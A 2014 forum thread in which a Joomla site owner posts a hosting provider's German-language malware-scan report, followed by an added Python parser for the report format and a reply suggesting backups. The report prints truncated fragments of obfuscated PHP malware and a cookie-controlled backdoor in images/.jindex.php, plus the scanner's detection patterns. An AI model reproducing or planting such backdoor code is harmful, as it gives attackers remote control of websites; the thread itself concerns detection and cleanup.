Author Topic: Looks like my site has been hacked !!  (Read 337 times)
hoppline
« on: April 10, 2014, 12:37:41 PM »

My site went offline a few minutes ago and I got a mail from my host with the following below!! In communication with my host I deleted two files and they put the site back online. Afterwards I changed all passwords and users. Anything else I have to think of?


###########################################################
#
#                         MalwareScanner
#
#
# Beschreibung:
# Der MalwareScanner ist Signatur basiert und kann daher nur bekannte Malware finden!
# Dieser prueft nur Dateien mit bestimmten Endungen, welche nicht binaer sind.
#
# Bei wenigen Treffer/Funde (weniger als 3 Stueck), pruefen Sie bitte die Suchmuster, Warnings und Signatur-Version im Detail manuell!
# Bei Fragen oder nicht gefundener Malware, wenden Sie sich bitte an unsere Technik-Abteilung.
#
#
#
# Signatur:            2014-04-09 17:34:00
# Such-Pfad:           /kunden/
# Start-Zeit:          10.04.2014 19:27:22 +0200
#
#
# Alle Ergebnisse OHNE GEWAEHR!!!
#
###########################################################

Lese nun alle Verzeichnisse ein........
Pruefe nun die Files auf Malware.....

0% abgeschlossen.

10% abgeschlossen.

20% abgeschlossen.




FUNDE: 2x
#######################################
/kunden/XXXXX/administrator/components/com_profiles/filemanager/js/dojo.js      
#######################################
Changed    ->   12.02.2014 03:46:15 +0100
Zeile    ->   SuchMuster         ->     FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
16    ->   .*=.*s.*pli.*t.*;.*=.*;...   ->     \(function\(\)\{var _1=null\;if\(\(_1\|\|\(typeof djConfig!=\&\#34\;undefined\&\#34\;\&\&djConfig.scopeMap\)\)\&\&\(typeof window!=\&\#34\;undefined\&\#34\;\)\)\{var _2=\&\#34\;\&\#34\;,_3=\&\#34\;\&\#34\;,_4=\&\#34\;\&\#34\;,_5=\{\},_6=\{\}\;_1=_1\|\|djConfig.scopeMap\;for\(var i=0\;i
16    ->   eval(_(.*)((.*)((.*))))   ->     \(function\(\)\{var _1=null\;if\(\(_1\|\|\(typeof djConfig!=\&\#34\;undefined\&\#34\;\&\&djConfig.scopeMap\)\)\&\&\(typeof window!=\&\#34\;undefined\&\#34\;\)\)\{var _2=\&\#34\;\&\#34\;,_3=\&\#34\;\&\#34\;,_4=\&\#34\;\&\#34\;,_5=\{\},_6=\{\}\;_1=_1\|\|djConfig.scopeMap\;for\(var i=0\;i



FUNDE: 1x
#######################################
/kunden/XXXXX/administrator/components/com_profiles/filemanager/js/codemirror/lib/util/closetag.js      
#######################################
Changed    ->   12.02.2014 03:46:15 +0100
Zeile    ->   SuchMuster         ->     FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
39    ->   WARNING: "keygen",         ->     var htmlDontClose = \[\&\#34\;area\&\#34\;, \&\#34\;base\&\#34\;, \&\#34\;br\&\#34\;, \&\#34\;col\&\#34\;, \&\#34\;command\&\#34\;, \&\#34\;embed\&\#34\;, \&\#34\;hr\&\#34\;, \&\#34\;img\&\#34\;, \&\#34\;input\&\#34\;, \&\#34\;keygen\&\#34\;, \&\#34\;link\&\#34\;, \&\#34\;meta\&\#34\;, \&\#34\;param\&\#34\;,
30% abgeschlossen.

40% abgeschlossen.

50% abgeschlossen.




FUNDE: 9x
#######################################
/kunden/XXXXX/components/com_jdonation/dtyh33.php      
#######################################
Changed    ->   09.04.2014 04:20:59 +0200
Zeile    ->   SuchMuster         ->     FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
1    ->   .*eval((.*));exit         ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   <?php ${"GLOBALS"}[.*]=...   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   @fclose(${${"GLOBALS"}[...   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   ${"GLOBALS"}[.*]=".*";$...   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   <?php ${"GL.*B.*L.*"}[....   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   {eval(base64_decode($_(...   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   eval(base64_decode($_.*...   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
1    ->   WARNING: eval(base64      ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
0    ->   WARNING: 2 Zeilen, 19x boeser Code   ->     \<\?php \$\{"GLOBALS"\}\["vbopuhuwlwj"\]="func"\;\$\{"GLOBALS"\}\["sglecinjqj"\]="h"\;\$\{"GLOBALS"\}\["ghvlqxys"\]="res"\;\$\{"GLOBALS"\}\["eidxzltlegek"\]="h_detected"\;\$\{"GLOBALS"\}\["eqlpdjq"\]="headers"\;\$\{"GLOBALS"\}\["npnjrfmeyknj"\]="data"\;\$\{"GLOBALS"\}\["iopwylwq"\]="k"\;\$\{"GLOBALS"\}\["dwpolchwjza"\]="cookie"\;\$\{"GLOBALS"\}\[\"sqmvc
60% abgeschlossen.




FUNDE: 6x
#######################################
/kunden/XXXXX/images/.jindex.php      
#######################################
Changed    ->   08.04.2014 00:23:18 +0200
Zeile    ->   SuchMuster         ->     FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
0    ->   !!! BadFileName (File)      ->     Boeser Datei-Name
0    ->   !!! BadFileName (File)      ->     Boeser Datei-Name
10    ->   .*=@$_COOKIE[.Jlma3.];      ->     \$file=@\$_COOKIE\[\&\#39\;Jlma3\&\#39\;\]\;
10    ->   Jlma3      ->     \$file=@\$_COOKIE\[\&\#39\;Jlma3\&\#39\;\]\;
11    ->   Jlma1      ->     if \(\$file\)\{ \$opt=\$file\(@\$_COOKIE\[\&\#39\;Jlma2\&\#39\;\]\)\; \$au=\$file\(@\$_COOKIE\[\&\#39\;Jlma1\&\#39\;\]\)\; \$opt\(\&\#34\;/292/\&\#34\;,\$au,292\)\; die\(\)\;\} else \{phpinfo\(\)\;die\;\}\}\}
11    ->   Jlma2      ->     if \(\$file\)\{ \$opt=\$file\(@\$_COOKIE\[\&\#39\;Jlma2\&\#39\;\]\)\; \$au=\$file\(@\$_COOKIE\[\&\#39\;Jlma1\&\#39\;\]\)\; \$opt\(\&\#34\;/292/\&\#34\;,\$au,292\)\; die\(\)\;\} else \{phpinfo\(\)\;die\;\}\}\}
« Last Edit: April 10, 2014, 01:58:38 PM by hoppline » Logged
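
Added example, not part of the original post or the host's scanner: a small Python parser for the report layout above that groups the rows per file and applies the report header's rule that a file with fewer than three hits needs a manual check. The sample text is constructed from the report with the payload column shortened, and the `triage` labels are this example's own.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the report's layout; payload column shortened.
SAMPLE = """\
FUNDE: 2x
#######################################
/kunden/XXXXX/administrator/components/com_profiles/filemanager/js/dojo.js
#######################################
Changed    ->   12.02.2014 03:46:15 +0100
Zeile    ->   SuchMuster         ->     FUND (Max. 300 Zeichen, ...)
16    ->   .*=.*s.*pli.*t.*;.*=.*;...   ->     (function(){var _1=null;
16    ->   eval(_(.*)((.*)((.*))))   ->     (function(){var _1=null;
FUNDE: 6x
#######################################
/kunden/XXXXX/images/.jindex.php
#######################################
Changed    ->   08.04.2014 00:23:18 +0200
0    ->   !!! BadFileName (File)      ->     Boeser Datei-Name
10    ->   Jlma3      ->     $file=@$_COOKIE['Jlma3'];
"""

@dataclass
class Finding:
    path: str                     # line between the two '#' rulers
    declared: int                 # N from the "FUNDE: Nx" line
    changed: str = ""
    rows: list = field(default_factory=list)   # (line number, pattern)
ROW = re.compile(r"^(\d+)\s+->\s+(.*?)\s+->\s")   # Zeile -> SuchMuster -> FUND

def parse_report(text):
    findings, lines = [], text.splitlines()
    for i, line in enumerate(lines):
        if (m := re.match(r"FUNDE:\s*(\d+)x", line)) and i + 2 < len(lines):
            findings.append(Finding(lines[i + 2].strip(), int(m.group(1))))
        elif findings and line.startswith("Changed"):
            findings[-1].changed = line.split("->", 1)[1].strip()
        elif findings and (r := ROW.match(line)):
            findings[-1].rows.append((int(r.group(1)), r.group(2)))
    return findings

def triage(f):
    # Labels are this example's own; the <3 threshold is the report header's.
    if any(p.startswith("!!! BadFileName") for _, p in f.rows):
        return "bad-filename"
    return "manual-review" if f.declared < 3 else "multiple-signatures"

if __name__ == "__main__":
    for f in parse_report(SAMPLE):
        print(triage(f), f.declared, f.changed, f.path)
```
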
mikenicoll
« Reply #1 on: April 10, 2014, 10:13:50 PM »

Hello,

I would contact your host and initiate a full backup from when your site was functional. Also be sure to read up on the Joomla Security Blog and extensions on extensions.joomla.org. They can provide some useful information and extensions to help protect your site.

-Mike

Mike Nicoll
------------
Shape 5 Team
